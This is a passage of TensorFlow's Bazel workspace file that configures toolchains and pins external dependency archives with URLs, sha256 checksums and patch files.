\"local_config_python\")\n rocm_configure(name = \"local_config_rocm\")\n remote_execution_configure(name = \"local_config_remote_execution\")\n\n # For Windows bazel build\n # TODO: Remove def file filter when TensorFlow can export symbols properly on Windows.\n def_file_filter_configure(name = \"local_config_def_file_filter\")\n\n # Point //external/local_config_arm_compiler to //external/arm_compiler\n arm_compiler_configure(\n name = \"local_config_arm_compiler\",\n build_file = \"//tensorflow/tools/toolchains/cpus/arm:template.BUILD\",\n remote_config_repo_arm = \"../arm_compiler\",\n remote_config_repo_aarch64 = \"../aarch64_compiler\",\n )\n\n # Load aarch64 toolchain\n aarch64_compiler_configure()\n\n # TFLite crossbuild toolchain for embedded Linux\n arm_linux_toolchain_configure(\n name = \"local_config_embedded_arm\",\n build_file = \"//tensorflow/tools/toolchains/embedded/arm-linux:template.BUILD\",\n aarch64_repo = \"../aarch64_linux_toolchain\",\n armhf_repo = \"../armhf_linux_toolchain\",\n )\n\n# Define all external repositories required by TensorFlow\ndef _tf_repositories():\n \"\"\"All external dependencies for TF builds.\"\"\"\n\n # To update any of the dependencies below:\n # a) update URL and strip_prefix to the new git commit hash\n # b) get the sha256 hash of the commit by running:\n # curl -L <url> | sha256sum\n # and update the sha256 with the result.\n # c) TF's automation will then upload the mirrored archive. 
For more information as well as\n # how to manually upload a mirror if necessary, see go/tf_mirror_md.\n\n # LINT.IfChange\n tf_http_archive(\n name = \"XNNPACK\",\n sha256 = \"ca829b6486d7dcc0a63eae9d5d5be21dcb542e6601af4cada17b9d5f7d5fafb7\",\n strip_prefix = \"XNNPACK-0cbbe74a16e6ca11acf8484ccac85f620336dea4\",\n urls = tf_mirror_urls(\"https://github.com/google/XNNPACK/archive/0cbbe74a16e6ca11acf8484ccac85f620336dea4.zip\"),\n )\n # LINT.ThenChange(//tensorflow/lite/tools/cmake/modules/xnnpack.cmake)\n\n tf_http_archive(\n name = \"FXdiv\",\n sha256 = \"3d7b0e9c4c658a84376a1086126be02f9b7f753caa95e009d9ac38d11da444db\",\n strip_prefix = \"FXdiv-63058eff77e11aa15bf531df5dd34395ec3017c8\",\n urls = tf_mirror_urls(\"https://github.com/Maratyszcza/FXdiv/archive/63058eff77e11aa15bf531df5dd34395ec3017c8.zip\"),\n )\n\n tf_http_archive(\n name = \"pthreadpool\",\n sha256 = \"a4cf06de57bfdf8d7b537c61f1c3071bce74e57524fe053e0bbd2332feca7f95\",\n strip_prefix = \"pthreadpool-4fe0e1e183925bf8cfa6aae24237e724a96479b8\",\n urls = tf_mirror_urls(\"https://github.com/Maratyszcza/pthreadpool/archive/4fe0e1e183925bf8cfa6aae24237e724a96479b8.zip\"),\n )\n\n tf_http_archive(\n name = \"cpuinfo\",\n strip_prefix = \"cpuinfo-ef634603954d88d2643d5809011288b890ac126e\",\n sha256 = \"e07512a11e1c71687359a133f49d60583d7465b737fe5dbe11f461c9aaa72a2b\",\n urls = tf_mirror_urls(\"https://github.com/pytorch/cpuinfo/archive/ef634603954d88d2643d5809011288b890ac126e.zip\"),\n )\n\n tf_http_archive(\n name = \"cudnn_frontend_archive\",\n build_file = \"//third_party:cudnn_frontend.BUILD\",\n patch_file = [\"//third_party:cudnn_frontend_header_fix.patch\"],\n sha256 = \"d8dba9e2607a0c256aa8eacb45b39986ab6f3f24a4d431d4397047a3cb0cd4fb\",\n strip_prefix = \"cudnn-frontend-0.9\",\n urls = tf_mirror_urls(\"https://github.com/NVIDIA/cudnn-frontend/archive/refs/tags/v0.9.zip\"),\n )\n\n tf_http_archive(\n name = \"mkl_dnn_v1\",\n build_file = \"//third_party/mkl_dnn:mkldnn_v1.BUILD\",\n sha256 = \"a50993aa6265b799b040fe745e0010502f9f7103cc53a9525d59646aef006633\",\n strip_prefix = \"oneDNN-2.7.3\",\n urls = tf_mirror_urls(\"https://github.com/oneapi-src/oneDNN/archive/refs/tags/v2.7.3.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"onednn\",\n build_file = \"//third_party/mkl_dnn:mkldnn_v1.BUILD\",\n sha256 = \"8d150a77025f38bff182aaef4dd643625563b2f311c635f86cf4b769b04d7b48\",\n strip_prefix = \"oneDNN-3.3\",\n urls = tf_mirror_urls(\"https://github.com/oneapi-src/oneDNN/archive/refs/tags/v3.3.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"mkl_dnn_acl_compatible\",\n build_file = \"//third_party/mkl_dnn:mkldnn_acl.BUILD\",\n patch_file = [\n \"//third_party/mkl_dnn:onednn_acl_threadcap.patch\",\n \"//third_party/mkl_dnn:onednn_acl_reorder.patch\",\n \"//third_party/mkl_dnn:onednn_acl_thread_local_scheduler.patch\",\n \"//third_party/mkl_dnn:onednn_acl_fp32_bf16_reorder.patch\",\n \"//third_party/mkl_dnn:onednn_acl_bf16_capability_detection_for_ubuntu20.04.patch\",\n ],\n sha256 = \"2f76b407ef8893cca71340f88cd800019a1f14f8ac1bbdbb89a84be1370b52e3\",\n strip_prefix = \"oneDNN-3.2.1\",\n urls = tf_mirror_urls(\"https://github.com/oneapi-src/oneDNN/archive/refs/tags/v3.2.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"compute_library\",\n patch_file = [\n \"//third_party/compute_library:compute_library.patch\",\n \"//third_party/compute_library:acl_thread_local_scheduler.patch\",\n ],\n sha256 = \"c4ca329a78da380163b2d86e91ba728349b6f0ee97d66e260a694ef37f0b0d93\",\n strip_prefix = \"ComputeLibrary-23.05.1\",\n urls = 
tf_mirror_urls(\"https://github.com/ARM-software/ComputeLibrary/archive/v23.05.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"arm_compiler\",\n build_file = \"//:arm_compiler.BUILD\",\n sha256 = \"b9e7d50ffd9996ed18900d041d362c99473b382c0ae049b2fce3290632d2656f\",\n strip_prefix = \"rpi-newer-crosstools-eb68350c5c8ec1663b7fe52c742ac4271e3217c5/x64-gcc-6.5.0/arm-rpi-linux-gnueabihf/\",\n urls = tf_mirror_urls(\"https://github.com/rvagg/rpi-newer-crosstools/archive/eb68350c5c8ec1663b7fe52c742ac4271e3217c5.tar.gz\"),\n )\n\n tf_http_archive(\n # This is the latest `aarch64-none-linux-gnu` compiler provided by ARM\n # See https://developer.arm.com/tools-and-software/open-source-software/developer-tools/gnu-toolchain/gnu-a/downloads\n # The archive contains GCC version 9.2.1\n name = \"aarch64_compiler\",\n build_file = \"//:arm_compiler.BUILD\",\n sha256 = \"8dfe681531f0bd04fb9c53cf3c0a3368c616aa85d48938eebe2b516376e06a66\",\n strip_prefix = \"gcc-arm-9.2-2019.12-x86_64-aarch64-none-linux-gnu\",\n urls = tf_mirror_urls(\"https://developer.arm.com/-/media/Files/downloads/gnu-a/9.2-2019.12/binrel/gcc-arm-9.2-2019.12-x86_64-aarch64-none-linux-gnu.tar.xz\"),\n )\n\n tf_http_archive(\n name = \"aarch64_linux_toolchain\",\n build_file = \"//tensorflow/tools/toolchains/embedded/arm-linux:aarch64-linux-toolchain.BUILD\",\n sha256 = \"50cdef6c5baddaa00f60502cc8b59cc11065306ae575ad2f51e412a9b2a90364\",\n strip_prefix = \"arm-gnu-toolchain-11.3.rel1-x86_64-aarch64-none-linux-gnu\",\n urls = tf_mirror_urls(\"https://developer.arm.com/-/media/Files/downloads/gnu/11.3.rel1/binrel/arm-gnu-toolchain-11.3.rel1-x86_64-aarch64-none-linux-gnu.tar.xz\"),\n )\n\n tf_http_archive(\n name = \"armhf_linux_toolchain\",\n build_file = \"//tensorflow/tools/toolchains/embedded/arm-linux:armhf-linux-toolchain.BUILD\",\n sha256 = \"3f76650b1d048036473b16b647b8fd005ffccd1a2869c10994967e0e49f26ac2\",\n strip_prefix = \"arm-gnu-toolchain-11.3.rel1-x86_64-arm-none-linux-gnueabihf\",\n urls = tf_mirror_urls(\"https://developer.arm.com/-/media/Files/downloads/gnu/11.3.rel1/binrel/arm-gnu-toolchain-11.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz\"),\n )\n\n tf_http_archive(\n name = \"com_googlesource_code_re2\",\n sha256 = \"ef516fb84824a597c4d5d0d6d330daedb18363b5a99eda87d027e6bdd9cba299\",\n strip_prefix = \"re2-03da4fc0857c285e3a26782f6bc8931c4c950df4\",\n system_build_file = \"//third_party/systemlibs:re2.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/re2/archive/03da4fc0857c285e3a26782f6bc8931c4c950df4.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_github_google_crc32c\",\n sha256 = \"6b3b1d861bb8307658b2407bc7a4c59e566855ef5368a60b35c893551e4788e9\",\n build_file = \"@com_github_googlecloudplatform_google_cloud_cpp//bazel:crc32c.BUILD\",\n strip_prefix = \"crc32c-1.0.6\",\n urls = tf_mirror_urls(\"https://github.com/google/crc32c/archive/1.0.6.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_github_googlecloudplatform_google_cloud_cpp\",\n sha256 = \"ff82045b9491f0d880fc8e5c83fd9542eafb156dcac9ff8c6209ced66ed2a7f0\",\n strip_prefix = \"google-cloud-cpp-1.17.1\",\n repo_mapping = {\n \"@com_github_curl_curl\": \"@curl\",\n \"@com_github_nlohmann_json\": \"@nlohmann_json_lib\",\n },\n system_build_file = \"//third_party/systemlibs:google_cloud_cpp.BUILD\",\n system_link_files = {\n \"//third_party/systemlibs:google_cloud_cpp.google.cloud.bigtable.BUILD\": \"google/cloud/bigtable/BUILD\",\n },\n urls = tf_mirror_urls(\"https://github.com/googleapis/google-cloud-cpp/archive/v1.17.1.tar.gz\"),\n )\n\n 
tf_http_archive(\n name = \"com_github_googlecloudplatform_tensorflow_gcp_tools\",\n sha256 = \"5e9ebe17eaa2895eb7f77fefbf52deeda7c4b63f5a616916b823eb74f3a0c542\",\n strip_prefix = \"tensorflow-gcp-tools-2643d8caeba6ca2a6a0b46bb123953cb95b7e7d5\",\n urls = tf_mirror_urls(\"https://github.com/GoogleCloudPlatform/tensorflow-gcp-tools/archive/2643d8caeba6ca2a6a0b46bb123953cb95b7e7d5.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_googleapis\",\n build_file = \"//third_party/googleapis:googleapis.BUILD\",\n sha256 = \"249d83abc5d50bf372c35c49d77f900bff022b2c21eb73aa8da1458b6ac401fc\",\n strip_prefix = \"googleapis-6b3fdcea8bc5398be4e7e9930c693f0ea09316a0\",\n urls = tf_mirror_urls(\"https://github.com/googleapis/googleapis/archive/6b3fdcea8bc5398be4e7e9930c693f0ea09316a0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"png\",\n build_file = \"//third_party:png.BUILD\",\n patch_file = [\"//third_party:png_fix_rpi.patch\"],\n sha256 = \"a00e9d2f2f664186e4202db9299397f851aea71b36a35e74910b8820e380d441\",\n strip_prefix = \"libpng-1.6.39\",\n system_build_file = \"//third_party/systemlibs:png.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/glennrp/libpng/archive/v1.6.39.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"org_sqlite\",\n build_file = \"//third_party:sqlite.BUILD\",\n sha256 = \"bb5849ae4d7129c09d20596379a0b3f7b1ac59cf9998eba5ef283ea9b6c000a5\",\n strip_prefix = \"sqlite-amalgamation-3430000\",\n system_build_file = \"//third_party/systemlibs:sqlite.BUILD\",\n urls = tf_mirror_urls(\"https://www.sqlite.org/2023/sqlite-amalgamation-3430000.zip\"),\n )\n\n tf_http_archive(\n name = \"gif\",\n build_file = \"//third_party:gif.BUILD\",\n patch_file = [\n \"//third_party:gif_fix_strtok_r.patch\",\n \"//third_party:gif_fix_image_counter.patch\",\n ],\n sha256 = \"31da5562f44c5f15d63340a09a4fd62b48c45620cd302f77a6d9acf0077879bd\",\n strip_prefix = \"giflib-5.2.1\",\n system_build_file = \"//third_party/systemlibs:gif.BUILD\",\n urls = tf_mirror_urls(\"https://pilotfiber.dl.sourceforge.net/project/giflib/giflib-5.2.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"six_archive\",\n build_file = \"//third_party:six.BUILD\",\n sha256 = \"1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926\",\n strip_prefix = \"six-1.16.0\",\n system_build_file = \"//third_party/systemlibs:six.BUILD\",\n urls = tf_mirror_urls(\"https://pypi.python.org/packages/source/s/six/six-1.16.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"absl_py\",\n sha256 = \"a7c51b2a0aa6357a9cbb2d9437e8cd787200531867dc02565218930b6a32166e\",\n strip_prefix = \"abseil-py-1.0.0\",\n system_build_file = \"//third_party/systemlibs:absl_py.BUILD\",\n system_link_files = {\n \"//third_party/systemlibs:absl_py.absl.BUILD\": \"absl/BUILD\",\n \"//third_party/systemlibs:absl_py.absl.flags.BUILD\": \"absl/flags/BUILD\",\n \"//third_party/systemlibs:absl_py.absl.testing.BUILD\": \"absl/testing/BUILD\",\n \"//third_party/systemlibs:absl_py.absl.logging.BUILD\": \"absl/logging/BUILD\",\n },\n urls = tf_mirror_urls(\"https://github.com/abseil/abseil-py/archive/refs/tags/v1.0.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_protobuf\",\n patch_file = [\"//third_party/protobuf:protobuf.patch\"],\n sha256 = \"f66073dee0bc159157b0bd7f502d7d1ee0bc76b3c1eac9836927511bdc4b3fc1\",\n strip_prefix = \"protobuf-3.21.9\",\n system_build_file = \"//third_party/systemlibs:protobuf.BUILD\",\n system_link_files = {\n \"//third_party/systemlibs:protobuf.bzl\": \"protobuf.bzl\",\n \"//third_party/systemlibs:protobuf_deps.bzl\": 
\"protobuf_deps.bzl\",\n },\n urls = tf_mirror_urls(\"https://github.com/protocolbuffers/protobuf/archive/v3.21.9.zip\"),\n )\n\n tf_http_archive(\n name = \"nsync\",\n patch_file = [\"//third_party:nsync.patch\"],\n sha256 = \"2be9dbfcce417c7abcc2aa6fee351cd4d292518d692577e74a2c6c05b049e442\",\n strip_prefix = \"nsync-1.25.0\",\n system_build_file = \"//third_party/systemlibs:nsync.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/nsync/archive/1.25.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_googletest\",\n sha256 = \"81964fe578e9bd7c94dfdb09c8e4d6e6759e19967e397dbea48d1c10e45d0df2\",\n strip_prefix = \"googletest-release-1.12.1\",\n urls = tf_mirror_urls(\"https://github.com/google/googletest/archive/refs/tags/release-1.12.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_fuzztest\",\n sha256 = \"c75f224b34c3c62ee901381fb743f6326f7b91caae0ceb8fe62f3fd36f187627\",\n strip_prefix = \"fuzztest-58b4e7065924f1a284952b84ea827ce35a87e4dc\",\n urls = tf_mirror_urls(\"https://github.com/google/fuzztest/archive/58b4e7065924f1a284952b84ea827ce35a87e4dc.zip\"),\n )\n\n tf_http_archive(\n name = \"com_github_gflags_gflags\",\n sha256 = \"34af2f15cf7367513b352bdcd2493ab14ce43692d2dcd9dfc499492966c64dcf\",\n strip_prefix = \"gflags-2.2.2\",\n urls = tf_mirror_urls(\"https://github.com/gflags/gflags/archive/v2.2.2.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"curl\",\n build_file = \"//third_party:curl.BUILD\",\n sha256 = \"816e41809c043ff285e8c0f06a75a1fa250211bbfb2dc0a037eeef39f1a9e427\",\n strip_prefix = \"curl-8.4.0\",\n system_build_file = \"//third_party/systemlibs:curl.BUILD\",\n urls = tf_mirror_urls(\"https://curl.se/download/curl-8.4.0.tar.gz\"),\n )\n\n # WARNING: make sure ncteisen@ and vpai@ are cc-ed on any CL to change the below rule\n tf_http_archive(\n name = \"com_github_grpc_grpc\",\n sha256 = \"b956598d8cbe168b5ee717b5dafa56563eb5201a947856a6688bbeac9cac4e1f\",\n strip_prefix = \"grpc-b54a5b338637f92bfcf4b0bc05e0f57a5fd8fadd\",\n system_build_file = \"//third_party/systemlibs:grpc.BUILD\",\n patch_file = [\n \"//third_party/grpc:generate_cc_env_fix.patch\",\n \"//third_party/grpc:register_go_toolchain.patch\",\n ],\n system_link_files = {\n \"//third_party/systemlibs:BUILD\": \"bazel/BUILD\",\n \"//third_party/systemlibs:grpc.BUILD\": \"src/compiler/BUILD\",\n \"//third_party/systemlibs:grpc.bazel.grpc_deps.bzl\": \"bazel/grpc_deps.bzl\",\n \"//third_party/systemlibs:grpc.bazel.grpc_extra_deps.bzl\": \"bazel/grpc_extra_deps.bzl\",\n \"//third_party/systemlibs:grpc.bazel.cc_grpc_library.bzl\": \"bazel/cc_grpc_library.bzl\",\n \"//third_party/systemlibs:grpc.bazel.generate_cc.bzl\": \"bazel/generate_cc.bzl\",\n \"//third_party/systemlibs:grpc.bazel.protobuf.bzl\": \"bazel/protobuf.bzl\",\n },\n urls = tf_mirror_urls(\"https://github.com/grpc/grpc/archive/b54a5b338637f92bfcf4b0bc05e0f57a5fd8fadd.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"linenoise\",\n build_file = \"//third_party:linenoise.BUILD\",\n sha256 = \"b35a74dbc9cd2fef9e4d56222761d61daf7e551510e6cd1a86f0789b548d074e\",\n strip_prefix = \"linenoise-4ce393a66b10903a0ef52edf9775ed526a17395f\",\n urls = tf_mirror_urls(\"https://github.com/antirez/linenoise/archive/4ce393a66b10903a0ef52edf9775ed526a17395f.tar.gz\"),\n )\n\n llvm_setup(name = \"llvm-project\")\n\n # Intel openMP that is part of LLVM sources.\n tf_http_archive(\n name = \"llvm_openmp\",\n build_file = \"//third_party/llvm_openmp:BUILD\",\n patch_file = [\"//third_party/llvm_openmp:openmp_switch_default_patch.patch\"],\n 
sha256 = \"d19f728c8e04fb1e94566c8d76aef50ec926cd2f95ef3bf1e0a5de4909b28b44\",\n strip_prefix = \"openmp-10.0.1.src\",\n urls = tf_mirror_urls(\"https://github.com/llvm/llvm-project/releases/download/llvmorg-10.0.1/openmp-10.0.1.src.tar.xz\"),\n )\n\n tf_http_archive(\n name = \"jsoncpp_git\",\n sha256 = \"f409856e5920c18d0c2fb85276e24ee607d2a09b5e7d5f0a371368903c275da2\",\n strip_prefix = \"jsoncpp-1.9.5\",\n system_build_file = \"//third_party/systemlibs:jsoncpp.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/open-source-parsers/jsoncpp/archive/1.9.5.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"boringssl\",\n sha256 = \"9dc53f851107eaf87b391136d13b815df97ec8f76dadb487b58b2fc45e624d2c\",\n strip_prefix = \"boringssl-c00d7ca810e93780bd0c8ee4eea28f4f2ea4bcdc\",\n system_build_file = \"//third_party/systemlibs:boringssl.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/boringssl/archive/c00d7ca810e93780bd0c8ee4eea28f4f2ea4bcdc.tar.gz\"),\n )\n\n # Note: if you update this, you have to update libpng too. See cl/437813808\n tf_http_archive(\n name = \"zlib\",\n build_file = \"//third_party:zlib.BUILD\",\n sha256 = \"b3a24de97a8fdbc835b9833169501030b8977031bcb54b3b3ac13740f846ab30\",\n strip_prefix = \"zlib-1.2.13\",\n system_build_file = \"//third_party/systemlibs:zlib.BUILD\",\n urls = tf_mirror_urls(\"https://zlib.net/fossils/zlib-1.2.13.tar.gz\"),\n )\n\n # LINT.IfChange\n tf_http_archive(\n name = \"fft2d\",\n build_file = \"//third_party/fft2d:fft2d.BUILD\",\n sha256 = \"5f4dabc2ae21e1f537425d58a49cdca1c49ea11db0d6271e2a4b27e9697548eb\",\n strip_prefix = \"OouraFFT-1.0\",\n urls = tf_mirror_urls(\"https://github.com/petewarden/OouraFFT/archive/v1.0.tar.gz\"),\n )\n # LINT.ThenChange(//tensorflow/lite/tools/cmake/modules/fft2d.cmake)\n\n tf_http_archive(\n name = \"snappy\",\n build_file = \"//third_party:snappy.BUILD\",\n sha256 = \"2e458b7017cd58dcf1469ab315389e85e7f445bd035188f2983f81fb19ecfb29\",\n strip_prefix = \"snappy-984b191f0fefdeb17050b42a90b7625999c13b8d\",\n system_build_file = \"//third_party/systemlibs:snappy.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/snappy/archive/984b191f0fefdeb17050b42a90b7625999c13b8d.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"nccl_archive\",\n build_file = \"//third_party:nccl/archive.BUILD\",\n patch_file = [\"//third_party/nccl:archive.patch\"],\n sha256 = \"16ac98f3e926c024ce48e10ab220e19ce734adc48c423cfd55ad6f509bd1179f\",\n strip_prefix = \"nccl-2.18.5-1\",\n urls = tf_mirror_urls(\"https://github.com/nvidia/nccl/archive/v2.18.5-1.tar.gz\"),\n )\n\n java_import_external(\n name = \"junit\",\n jar_sha256 = \"59721f0805e223d84b90677887d9ff567dc534d7c502ca903c0c2b17f05c116a\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/junit/junit/4.12/junit-4.12.jar\",\n \"https://repo1.maven.org/maven2/junit/junit/4.12/junit-4.12.jar\",\n \"https://maven.ibiblio.org/maven2/junit/junit/4.12/junit-4.12.jar\",\n ],\n licenses = [\"reciprocal\"], # Common Public License Version 1.0\n testonly_ = True,\n deps = [\"@org_hamcrest_core\"],\n )\n\n java_import_external(\n name = \"org_hamcrest_core\",\n jar_sha256 = \"66fdef91e9739348df7a096aa384a5685f4e875584cce89386a7a47251c4d8e9\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar\",\n \"https://repo1.maven.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar\",\n 
\"https://maven.ibiblio.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar\",\n ],\n licenses = [\"notice\"], # New BSD License\n testonly_ = True,\n )\n\n java_import_external(\n name = \"com_google_testing_compile\",\n jar_sha256 = \"edc180fdcd9f740240da1a7a45673f46f59c5578d8cd3fbc912161f74b5aebb8\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/com/google/testing/compile/compile-testing/0.11/compile-testing-0.11.jar\",\n \"https://repo1.maven.org/maven2/com/google/testing/compile/compile-testing/0.11/compile-testing-0.11.jar\",\n ],\n licenses = [\"notice\"], # New BSD License\n testonly_ = True,\n deps = [\"@com_google_guava\", \"@com_google_truth\"],\n )\n\n java_import_external(\n name = \"com_google_truth\",\n jar_sha256 = \"032eddc69652b0a1f8d458f999b4a9534965c646b8b5de0eba48ee69407051df\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/com/google/truth/truth/0.32/truth-0.32.jar\",\n \"https://repo1.maven.org/maven2/com/google/truth/truth/0.32/truth-0.32.jar\",\n ],\n licenses = [\"notice\"], # Apache 2.0\n testonly_ = True,\n deps = [\"@com_google_guava\"],\n )\n\n java_import_external(\n name = \"org_checkerframework_qual\",\n jar_sha256 = \"d261fde25d590f6b69db7721d469ac1b0a19a17ccaaaa751c31f0d8b8260b894\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/org/checkerframework/checker-qual/2.10.0/checker-qual-2.10.0.jar\",\n \"https://repo1.maven.org/maven2/org/checkerframework/checker-qual/2.10.0/checker-qual-2.10.0.jar\",\n ],\n licenses = [\"notice\"], # Apache 2.0\n )\n\n java_import_external(\n name = \"com_squareup_javapoet\",\n jar_sha256 = \"5bb5abdfe4366c15c0da3332c57d484e238bd48260d6f9d6acf2b08fdde1efea\",\n jar_urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/repo1.maven.org/maven2/com/squareup/javapoet/1.9.0/javapoet-1.9.0.jar\",\n \"https://repo1.maven.org/maven2/com/squareup/javapoet/1.9.0/javapoet-1.9.0.jar\",\n ],\n licenses = [\"notice\"], # Apache 2.0\n )\n\n tf_http_archive(\n name = \"com_google_pprof\",\n build_file = \"//third_party:pprof.BUILD\",\n sha256 = \"b844b75c25cfe7ea34b832b369ab91234009b2dfe2ae1fcea53860c57253fe2e\",\n strip_prefix = \"pprof-83db2b799d1f74c40857232cb5eb4c60379fe6c2\",\n urls = tf_mirror_urls(\"https://github.com/google/pprof/archive/83db2b799d1f74c40857232cb5eb4c60379fe6c2.tar.gz\"),\n )\n\n # The CUDA 11 toolkit ships with CUB. 
We should be able to delete this rule\n # once TF drops support for CUDA 10.\n tf_http_archive(\n name = \"cub_archive\",\n build_file = \"//third_party:cub.BUILD\",\n sha256 = \"162514b3cc264ac89d91898b58450190b8192e2af1142cf8ccac2d59aa160dda\",\n strip_prefix = \"cub-1.9.9\",\n urls = tf_mirror_urls(\"https://github.com/NVlabs/cub/archive/1.9.9.zip\"),\n )\n\n tf_http_archive(\n name = \"nvtx_archive\",\n build_file = \"//third_party:nvtx.BUILD\",\n sha256 = \"bb8d1536aad708ec807bc675e12e5838c2f84481dec4005cd7a9bbd49e326ba1\",\n strip_prefix = \"NVTX-3.0.1/c/include\",\n urls = tf_mirror_urls(\"https://github.com/NVIDIA/NVTX/archive/v3.0.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"cython\",\n build_file = \"//third_party:cython.BUILD\",\n sha256 = \"0c2eae8a4ceab7955be1e11a4ddc5dcc3aa06ce22ad594262f1555b9d10667f0\",\n strip_prefix = \"cython-3.0.3\",\n system_build_file = \"//third_party/systemlibs:cython.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/cython/cython/archive/3.0.3.tar.gz\"),\n )\n\n # LINT.IfChange\n tf_http_archive(\n name = \"arm_neon_2_x86_sse\",\n build_file = \"//third_party:arm_neon_2_x86_sse.BUILD\",\n sha256 = \"019fbc7ec25860070a1d90e12686fc160cfb33e22aa063c80f52b363f1361e9d\",\n strip_prefix = \"ARM_NEON_2_x86_SSE-a15b489e1222b2087007546b4912e21293ea86ff\",\n urls = tf_mirror_urls(\"https://github.com/intel/ARM_NEON_2_x86_SSE/archive/a15b489e1222b2087007546b4912e21293ea86ff.tar.gz\"),\n )\n # LINT.ThenChange(//tensorflow/lite/tools/cmake/modules/neon2sse.cmake)\n\n tf_http_archive(\n name = \"double_conversion\",\n sha256 = \"3dbcdf186ad092a8b71228a5962009b5c96abde9a315257a3452eb988414ea3b\",\n strip_prefix = \"double-conversion-3.2.0\",\n system_build_file = \"//third_party/systemlibs:double_conversion.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/double-conversion/archive/v3.2.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_float\",\n build_file = \"//third_party:tflite_mobilenet_float.BUILD\",\n sha256 = \"2fadeabb9968ec6833bee903900dda6e61b3947200535874ce2fe42a8493abc0\",\n urls = [\n \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224.tgz\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224.tgz\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_quant\",\n build_file = \"//third_party:tflite_mobilenet_quant.BUILD\",\n sha256 = \"d32432d28673a936b2d6281ab0600c71cf7226dfe4cdcef3012555f691744166\",\n urls = [\n \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224_quant.tgz\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224_quant.tgz\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_ssd\",\n build_file = str(Label(\"//third_party:tflite_mobilenet.BUILD\")),\n sha256 = \"767057f2837a46d97882734b03428e8dd640b93236052b312b2f0e45613c1cf0\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/models/tflite/mobilenet_ssd_tflite_v1.zip\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/tflite/mobilenet_ssd_tflite_v1.zip\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_ssd_quant\",\n build_file = str(Label(\"//third_party:tflite_mobilenet.BUILD\")),\n sha256 = \"a809cd290b4d6a2e8a9d5dad076e0bd695b8091974e0eed1052b480b2f21b6dc\",\n urls = [\n 
\"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/models/tflite/coco_ssd_mobilenet_v1_0.75_quant_2018_06_29.zip\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/tflite/coco_ssd_mobilenet_v1_0.75_quant_2018_06_29.zip\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_mobilenet_ssd_quant_protobuf\",\n build_file = str(Label(\"//third_party:tflite_mobilenet.BUILD\")),\n sha256 = \"09280972c5777f1aa775ef67cb4ac5d5ed21970acd8535aeca62450ef14f0d79\",\n strip_prefix = \"ssd_mobilenet_v1_quantized_300x300_coco14_sync_2018_07_18\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_quantized_300x300_coco14_sync_2018_07_18.tar.gz\",\n \"https://storage.googleapis.com/download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_quantized_300x300_coco14_sync_2018_07_18.tar.gz\",\n ],\n )\n\n tf_http_archive(\n name = \"tflite_conv_actions_frozen\",\n build_file = str(Label(\"//third_party:tflite_mobilenet.BUILD\")),\n sha256 = \"d947b38cba389b5e2d0bfc3ea6cc49c784e187b41a071387b3742d1acac7691e\",\n urls = [\n \"https://storage.googleapis.com/mirror.tensorflow.org/storage.googleapis.com/download.tensorflow.org/models/tflite/conv_actions_tflite.zip\",\n 